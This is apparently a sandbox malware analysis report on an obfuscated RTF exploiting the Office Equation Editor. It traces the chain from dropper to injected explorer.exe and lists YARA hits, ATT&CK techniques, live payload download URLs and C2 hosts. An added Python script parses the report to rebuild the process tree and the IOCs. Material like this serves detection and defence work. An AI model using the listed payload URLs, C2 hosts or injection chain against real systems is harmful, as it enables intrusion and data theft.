Source: explorer.exe, 00000008.00000002.879437350.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.354104889.0000000000720000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000008.00000002.879437350.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.354104889.0000000000720000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: !Progman
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: 6_2_00420043 GetLocaleInfoW
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: 6_2_0041FA29 EnumSystemLocalesW
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: 6_2_0041FAC4 GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: 6_2_0041BC92 EnumSystemLocalesW
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: 6_2_0041FD76 GetLocaleInfoW
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: 6_2_0041FD17 EnumSystemLocalesW
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: 6_2_0041FE4B EnumSystemLocalesW
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: 6_2_0041FE96 GetLocaleInfoW
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: 6_2_0041FF3D GetLocaleInfoW,GetLocaleInfoW,GetACP
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: 6_2_0041F7D3 GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: 6_2_0041B7A1 GetLocaleInfoW
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: 6_2_0040F496 cpuid
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Code function: 6_2_00410221 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
Source: C:\Users\user\AppData\Roaming\word.exe Code function: 5_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess
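The lines in this section describe one chain: EQNEDT32.EXE spawns word.exe, word.exe drops and runs twbcaze.exe, twbcaze.exe re-launches itself and maps execute/read/write sections into explorer.exe and cmstp.exe, and the injected explorer.exe is the process that resolves and contacts the C2 hosts while cmstp.exe deletes the dropper through cmd.exe. The following is an added example, not code from the Joe Sandbox report or from Joe Security: it rebuilds the process tree, the injection edges and the network IOCs from lines in the report's "Source:" format, and reproduces the logic behind the report's "System process connects to network (likely due to code injection or exploit)" verdict as a simple rule. The sample lines are constructed from this section (paths, IPs, hostnames and command lines copied from the page); the choice of C:\Windows\ as the only "system" location and the rule itself are assumptions of the example.

```python
"""Rebuild process tree, injection edges and IOCs from Joe Sandbox 'Source:' lines (added example)."""
import re
from collections import defaultdict

# Constructed from the report's HIPS / PFW / Operating System Protection Evasion lines.
SAMPLE_LINES = [
    r"Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe",
    r'Source: C:\Users\user\AppData\Roaming\word.exe Process created: C:\Users\user\AppData\Local\Temp\twbcaze.exe "C:\Users\user\AppData\Local\Temp\twbcaze.exe"',
    r"Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Process created: C:\Users\user\AppData\Local\Temp\twbcaze.exe C:\Users\user\AppData\Local\Temp\twbcaze.exe",
    r"Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\twbcaze.exe protection: execute and read and write",
    r"Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write",
    r"Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write",
    r"Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe Thread APC queued: target process: C:\Windows\explorer.exe",
    r"Source: C:\Windows\SysWOW64\cmstp.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write",
    r"Source: C:\Windows\explorer.exe Network Connect: 103.150.181.71 80",
    r"Source: C:\Windows\explorer.exe Domain query: www.xazeyu.net",
    r"Source: C:\Windows\explorer.exe Domain query: www.6061k.vip",
    r"Source: C:\Windows\explorer.exe Network Connect: 3.33.130.190 80",
    r'Source: C:\Windows\SysWOW64\cmstp.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\twbcaze.exe"',
]

SOURCE_RE = re.compile(r"^Source:\s*(.+?\.exe)\s*(.*)$", re.IGNORECASE)
CREATED_RE = re.compile(r"Process created:\s*(.+?\.exe)\s*(.*)$", re.IGNORECASE)
SECTION_RE = re.compile(r"Section loaded:.*?target:\s*(.+?\.exe)\s+protection:\s*(.+)$", re.IGNORECASE)
APC_RE = re.compile(r"Thread APC queued: target process:\s*(.+?\.exe)", re.IGNORECASE)
CONNECT_RE = re.compile(r"Network Connect:\s*(\S+)\s+(\d+)")
DNS_RE = re.compile(r"Domain query:\s*(\S+)")
DEL_RE = re.compile(r'\bdel\s+"?([^"]+?)"?\s*$', re.IGNORECASE)

SYSTEM_DIRS = ("c:\\windows\\",)   # assumption: where a 'system process' lives


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def build_model(lines):
    """Parse the lines into a process tree, injection map and per-process network activity."""
    model = {
        "tree": defaultdict(list),        # parent -> [child, ...]
        "injections": defaultdict(set),   # target -> {source, ...}
        "rwx_sections": [],               # (source, target) mapped with execute + write
        "network": defaultdict(lambda: {"ips": set(), "domains": set()}),
        "system_targets": set(),          # injection targets under a system directory
        "self_delete": [],                # files removed via cmd.exe /c del
    }
    for line in lines:
        m = SOURCE_RE.match(line)
        if not m:
            continue
        src, rest = basename(m.group(1)), m.group(2)
        if (c := CREATED_RE.search(rest)):
            child = basename(c.group(1))
            model["tree"][src].append(child)
            if child == "cmd.exe" and (d := DEL_RE.search(c.group(2))):
                model["self_delete"].append(d.group(1))
        elif (s := SECTION_RE.search(rest)) or (s := APC_RE.search(rest)):
            target = s.group(1)
            model["injections"][basename(target)].add(src)
            if s.re is SECTION_RE and "execute" in s.group(2) and "write" in s.group(2):
                model["rwx_sections"].append((src, basename(target)))
            if target.lower().startswith(SYSTEM_DIRS):
                model["system_targets"].add(basename(target))
        elif (n := CONNECT_RE.search(rest)):
            model["network"][src]["ips"].add(f"{n.group(1)}:{n.group(2)}")
        elif (q := DNS_RE.search(rest)):
            model["network"][src]["domains"].add(q.group(1))
    return model


def lineage(model, root):
    """Follow the first child at each level; a process that re-launches itself is listed once more, then the walk stops."""
    chain, cur = [root], root
    while model["tree"].get(cur):
        nxt = model["tree"][cur][0]
        chain.append(nxt)
        if nxt == cur:
            break
        cur = nxt
    return chain


def injected_system_processes_with_network(model):
    """The report's 'system process connects to network' condition: injected system process that then talked out."""
    return sorted(p for p in model["system_targets"] if model["network"].get(p))


def ioc_summary(model):
    ips, domains = set(), set()
    for v in model["network"].values():
        ips |= v["ips"]
        domains |= v["domains"]
    return {"ips": sorted(ips), "domains": sorted(domains)}


if __name__ == "__main__":
    m = build_model(SAMPLE_LINES)
    print("chain:", " -> ".join(lineage(m, "eqnedt32.exe")))
    print("injected into:", {k: sorted(v) for k, v in m["injections"].items()})
    print("beaconing system processes:", injected_system_processes_with_network(m))
    print("iocs:", ioc_summary(m), "self-delete:", m["self_delete"])
```

The self-injection edge (twbcaze.exe into its own second instance) is what the report labels process hollowing; the walk in lineage stops after one repeat so that edge does not loop. cmstp.exe is also an injection target under C:\Windows, but it never appears with network activity in these lines, so only explorer.exe satisfies the rule.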

          Stealing of Sensitive Information

Source: Yara match, file source: 00000006.00000002.353557579.0000000000230000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match, file source: 7.2.twbcaze.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match, file source: 7.2.twbcaze.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 6.2.twbcaze.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 6.2.twbcaze.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 00000007.00000002.363149838.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000009.00000002.879277529.00000000001A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000006.00000002.353559991.0000000000250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000009.00000002.879264468.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000007.00000002.363178353.00000000003D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

Source: Yara match, file source: 00000006.00000002.353557579.0000000000230000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match, file source: 7.2.twbcaze.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match, file source: 7.2.twbcaze.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 6.2.twbcaze.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 6.2.twbcaze.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 00000007.00000002.363149838.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000009.00000002.879277529.00000000001A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000006.00000002.353559991.0000000000250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000009.00000002.879264468.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000007.00000002.363178353.00000000003D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

MITRE ATT&CK Matrix

The report renders this as a grid; it is listed here by tactic. A figure in brackets is the count the report attaches to a technique it matched; entries without a figure are matrix cells the report did not match.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Native API [1]; Shared Modules [1]; Exploitation for Client Execution [23]; Command and Scripting Interpreter [3]; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: Process Injection [512]; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [3]; Software Packing [1]; Rootkit [1]; Masquerading [1]; Modify Registry [1]; Virtualization/Sandbox Evasion [2]; Process Injection [512]; HTML Smuggling
Credential Access: Credential API Hooking [1]; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery [1]; File and Directory Discovery [2]; System Information Discovery [127]; Query Registry [1]; Security Software Discovery [141]; Virtualization/Sandbox Evasion [2]; Process Discovery [2]; Application Window Discovery [1]; Remote System Discovery [1]
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data [1]; Credential API Hooking [1]; Clipboard Data [1]; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Data Staged
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Command and Control: Ingress Tool Transfer [5]; Encrypted Channel [11]; Non-Application Layer Protocol [3]; Application Layer Protocol [114]; Fallback Channels; Multiband Communication; Commonly Used Port; Web Protocols
Network Effects: Exploit SS7 to Redirect Phone Calls/SMS; SIM Card Swap
Remote Service Effects: Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: System Shutdown/Reboot [1]; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Behavior Graph

The report draws this as a diagram; only the text is recoverable here. Behavior Graph ID: 1345774, Sample: S SecuriteInfo.com.RTF.Obfusc..., Startdate: 21/11/2023, Architecture: WINDOWS, Score: 100
Sample-level signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Found malware configuration; 12 other signatures

Process tree:
WINWORD.EXE (started)
EQNEDT32.EXE (started; a second EQNEDT32.EXE instance was also started)
  network: swamini.in 103.224.247.210, ports 443, 49161, 49162, WEBWERKS-ASWebWerksIndiaPvtLtdIN, India
  dropped: C:\Users\user\AppData\Roaming\word.exe (PE32); C:\Users\user\AppData\...\balokarat2.1[1].exe (PE32)
  signatures: Office equation editor establishes network connection; Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
  word.exe (started by EQNEDT32.EXE)
    dropped: C:\Users\user\AppData\Local\...\twbcaze.exe (PE32)
    twbcaze.exe (started by word.exe)
      signatures: Detected unpacking (changes PE section rights); Machine Learning detection for dropped file; Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors); 2 other signatures
      twbcaze.exe (started by twbcaze.exe)
        signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
        explorer.exe (injected by twbcaze.exe)
          network: www.xazeyu.net 103.150.181.71, ports 49167, 80, NANBIAN-CNNingboNanbianTuoluoXinxiJishuCoLtdCN, unknown; www.shucaimh.com 107.164.111.101, ports 49165, 80, EGIHOSTINGUS, United States; 3 other IPs or domains
          signatures: System process connects to network (likely due to code injection or exploit)
          cmstp.exe (started by explorer.exe)
            signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
            cmd.exe (started by cmstp.exe)

Antivirus Detection

Initial sample:
Source | Detection | Scanner | Label
SecuriteInfo.com.RTF.Obfuscated-gen.19663.16514.rtf | 49% | ReversingLabs | Document-RTF.Exploit.CVE-2017-11882
SecuriteInfo.com.RTF.Obfuscated-gen.19663.16514.rtf | 55% | Virustotal | -
SecuriteInfo.com.RTF.Obfuscated-gen.19663.16514.rtf | 100% | Avira | HEUR/Rtf.Malformed

Dropped files:
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\twbcaze.exe | 100% | Joe Sandbox ML | -

No Antivirus matches

Domains:
Source | Detection | Scanner | Label
6061k.vip | 0% | Virustotal | -
www.xazeyu.net | 0% | Virustotal | -
swamini.in | 19% | Virustotal | -
www.shucaimh.com | 1% | Virustotal | -

URLs:
Source | Detection | Scanner | Label
http://ocsp.entrust.net03 | 0% | URL Reputation | safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe
http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
http://ocsp.entrust.net0D | 0% | URL Reputation | safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe
http://www.techsterverse.lifeReferer: | 0% | Avira URL Cloud | safe
http://www.janenas.top/t2ti/ | 100% | Avira URL Cloud | phishing
http://www.allamericanshuttlellc.com | 0% | Avira URL Cloud | safe
http://www.spacecargo.net | 0% | Avira URL Cloud | safe
http://www.albertcolet.com/t2ti/ | 100% | Avira URL Cloud | malware
http://www.xazeyu.net/t2ti/ | 100% | Avira URL Cloud | malware
http://www.janenas.top/t2ti/ | 1% | Virustotal | -
http://www.hhmhhhbh.xyz | 100% | Avira URL Cloud | malware
http://www.xazeyu.net/t2ti/ | 2% | Virustotal | -
http://www.maquibotanic.com/t2ti/ | 100% | Avira URL Cloud | malware
http://www.spacecargo.net | 1% | Virustotal | -
http://www.hhmhhhbh.xyz/t2ti/www.techsterverse.life | 100% | Avira URL Cloud | phishing
http://www.xazeyu.net/t2ti/www.fxzx01.icu | 100% | Avira URL Cloud | malware
http://www.hhmhhhbh.xyz | 1% | Virustotal | -
http://www.6061k.vip/t2ti/?ll=NdqLMf&4hO02rc=qDIrkJK7+k7t2cKm0yqLDiQOFM/oPqsB85v8vrvlTOlWprVZbJOF5qoRsr2uTLTXyB6S3g== | 100% | Avira URL Cloud | malware
http://www.mozilla.com0 | 0% | Avira URL Cloud | safe
http://crl.use | 0% | Avira URL Cloud | safe
http://www.shucaimh.com/t2ti/www.6061k.vip | 100% | Avira URL Cloud | malware
http://www.michealwilshire.onlineReferer: | 0% | Avira URL Cloud | safe
http://www.shucaimh.comReferer: | 0% | Avira URL Cloud | safe
http://www.michealwilshire.online | 0% | Avira URL Cloud | safe
http://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exe | 100% | Avira URL Cloud | malware
http://www.janenas.top/t2ti/www.alishopogolic.com | 100% | Avira URL Cloud | phishing
http://www.www32561b.com | 0% | Avira URL Cloud | safe
http://www.guimisha.com | 0% | Avira URL Cloud | safe
http://www.allamericanshuttlellc.com/t2ti/ | 100% | Avira URL Cloud | malware
http://www.michealwilshire.online | 0% | Virustotal | -
http://www.shucaimh.com/t2ti/?4hO02rc=giwc8XVj/AkHwdj5caWP9R2rVnZav6a8h1CJcH9em0U/x824OxogtA/AOr9gMChFXFyvXA==&ll=NdqLMf | 100% | Avira URL Cloud | malware
http://www.6061k.vip/t2ti/ | 100% | Avira URL Cloud | malware
http://www.www32561b.com | 0% | Virustotal | -
http://www.albertcolet.com/t2ti/www.guimisha.com | 100% | Avira URL Cloud | malware
http://www.6061k.vip/t2ti/www.xazeyu.net | 100% | Avira URL Cloud | malware
https://swamini.in/ | 100% | Avira URL Cloud | malware
http://www.guimisha.com | 0% | Virustotal | -
http://www.ssongg10292.cfdReferer: | 0% | Avira URL Cloud | safe
http://www.6061k.vip/t2ti/ | 2% | Virustotal | -
http://www.techsterverse.life/t2ti/www.www32561b.com | 100% | Avira URL Cloud | malware
http://www.guimisha.com/t2ti/www.ssongg10292.cfd | 100% | Avira URL Cloud | malware
https://swamini.in/ | 14% | Virustotal | -
http://www.hhmhhhbh.xyz/t2ti/ | 100% | Avira URL Cloud | phishing
http://www.shucaimh.com | 0% | Avira URL Cloud | safe
http://www.fxzx01.icuReferer: | 0% | Avira URL Cloud | safe
http://www.ssongg10292.cfd | 0% | Avira URL Cloud | safe
https://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exeqqC: | 100% | Avira URL Cloud | malware
http://www.spacecargo.net/t2ti/www.michealwilshire.online | 100% | Avira URL Cloud | malware
http://www.shucaimh.com | 1% | Virustotal | -
http://www.alishopogolic.com/t2ti/ | 100% | Avira URL Cloud | malware
http://www.guimisha.com/t2ti/ | 100% | Avira URL Cloud | malware
http://www.hhmhhhbh.xyz/t2ti/ | 3% | Virustotal | -
http://www.hhmhhhbh.xyzReferer: | 0% | Avira URL Cloud | safe
https://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exeemC: | 100% | Avira URL Cloud | malware
http://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exej | 100% | Avira URL Cloud | malware
https://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exe | 100% | Avira URL Cloud | malware
http://www.michealwilshire.online/t2ti/www.janenas.top | 100% | Avira URL Cloud | malware
http://www.allamericanshuttlellc.comReferer: | 0% | Avira URL Cloud | safe
http://www.guimisha.com/t2ti/ | 2% | Virustotal | -
http://www.maquibotanic.com | 0% | Avira URL Cloud | safe
http://www.janenas.topReferer: | 0% | Avira URL Cloud | safe
http://www.6061k.vipReferer: | 0% | Avira URL Cloud | safe
http://www.www32561b.com/t2ti/ | 100% | Avira URL Cloud | malware
http://www.xazeyu.net | 0% | Avira URL Cloud | safe
http://www.albertcolet.com | 0% | Avira URL Cloud | safe
http://www.fxzx01.icu/t2ti/ | 100% | Avira URL Cloud | malware
http://www.maquibotanic.com | 1% | Virustotal | -
http://www.spacecargo.netReferer: | 0% | Avira URL Cloud | safe
www.guimisha.com/t2ti/ | 100% | Avira URL Cloud | malware
http://www.techsterverse.life/t2ti/ | 100% | Avira URL Cloud | malware
http://www.www32561b.com/t2ti/ | 2% | Virustotal | -
http://www.xazeyu.netReferer: | 0% | Avira URL Cloud | safe
http://www.fxzx01.icu/t2ti/ | 1% | Virustotal | -
http://www.shucaimh.com/t2ti/ | 100% | Avira URL Cloud | malware
http://www.fxzx01.icu/t2ti/www.albertcolet.com | 100% | Avira URL Cloud | malware
http://www.xazeyu.net | 0% | Virustotal | -
http://java.sun.com | 0% | Avira URL Cloud | safe
www.guimisha.com/t2ti/ | 2% | Virustotal | -
http://www.techsterverse.life/t2ti/ | 2% | Virustotal | -
http://www.www32561b.com/t2ti/www.spacecargo.net | 100% | Avira URL Cloud | malware
http://www.spacecargo.net/t2ti/ | 100% | Avira URL Cloud | malware
http://java.sun.com | 0% | Virustotal | -
http://www.albertcolet.comReferer: | 0% | Avira URL Cloud | safe
http://www.spacecargo.net/t2ti/ | 2% | Virustotal | -
http://www.janenas.top | 0% | Virustotal | -
http://www.6061k.vip | 0% | Avira URL Cloud | safe
http://www.alishopogolic.comReferer: | 0% | Avira URL Cloud | safe
http://www.maquibotanic.comReferer: | 0% | Avira URL Cloud | safe
http://www.janenas.top | 0% | Avira URL Cloud | safe
http://www.techsterverse.life | 0% | Avira URL Cloud | safe
http://www.alishopogolic.com/t2ti/www.maquibotanic.com | 100% | Avira URL Cloud | malware
http://www.guimisha.comReferer: | 0% | Avira URL Cloud | safe
http://www.allamericanshuttlellc.com/t2ti/www.shucaimh.com | 100% | Avira URL Cloud | malware
http://www.michealwilshire.online/t2ti/ | 100% | Avira URL Cloud | malware
http://www.www32561b.comReferer: | 0% | Avira URL Cloud | safe
http://www.ssongg10292.cfd/t2ti/ | 100% | Avira URL Cloud | malware
http://www.alishopogolic.com | 0% | Avira URL Cloud | safe
http://www.fxzx01.icu | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
6061k.vip | 3.33.130.190 | true | true |  | unknown
www.xazeyu.net | 103.150.181.71 | true | true |  | unknown
swamini.in | 103.224.247.210 | true | true |  | unknown
www.shucaimh.com | 107.164.111.101 | true | true |  | unknown
www.allamericanshuttlellc.com | unknown | unknown | true |  | unknown
www.6061k.vip | unknown | unknown | true |  | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.6061k.vip/t2ti/?ll=NdqLMf&4hO02rc=qDIrkJK7+k7t2cKm0yqLDiQOFM/oPqsB85v8vrvlTOlWprVZbJOF5qoRsr2uTLTXyB6S3g== | true | Avira URL Cloud: malware | unknown
http://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exe | true | Avira URL Cloud: malware | unknown
http://www.shucaimh.com/t2ti/?4hO02rc=giwc8XVj/AkHwdj5caWP9R2rVnZav6a8h1CJcH9em0U/x824OxogtA/AOr9gMChFXFyvXA==&ll=NdqLMf | true | Avira URL Cloud: malware | unknown
https://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exe | true | Avira URL Cloud: malware | unknown
www.guimisha.com/t2ti/ | true | 2%, Virustotal, Browse; Avira URL Cloud: malware | low
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.techsterverse.lifeReferer: | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.janenas.top/t2ti/ | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | true | 1%, Virustotal, Browse; Avira URL Cloud: phishing | unknown
http://www.albertcolet.com/t2ti/ | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://www.spacecargo.net | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://www.allamericanshuttlellc.com | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.xazeyu.net/t2ti/ | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | 2%, Virustotal, Browse; Avira URL Cloud: malware | unknown
http://www.hhmhhhbh.xyz | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: malware | unknown
http://www.maquibotanic.com/t2ti/ | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://ocsp.entrust.net03 | EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.hhmhhhbh.xyz/t2ti/www.techsterverse.life | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
http://www.xazeyu.net/t2ti/www.fxzx01.icu | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://crl.use | EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.mozilla.com0 | explorer.exe, 00000008.00000000.355385878.0000000005E08000.00000004.00000010.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.shucaimh.com/t2ti/www.6061k.vip | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.diginotar.nl/cps/pkioverheid0 | EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.michealwilshire.onlineReferer: | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.shucaimh.comReferer: | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.michealwilshire.online | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://push.zhanzhang.baidu.com/push.js | explorer.exe, 00000008.00000002.881102573.000000000891F000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000009.00000002.879666706.000000000293F000.00000004.10000000.00040000.00000000.sdmp | false |  | high
http://www.janenas.top/t2ti/www.alishopogolic.com | explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
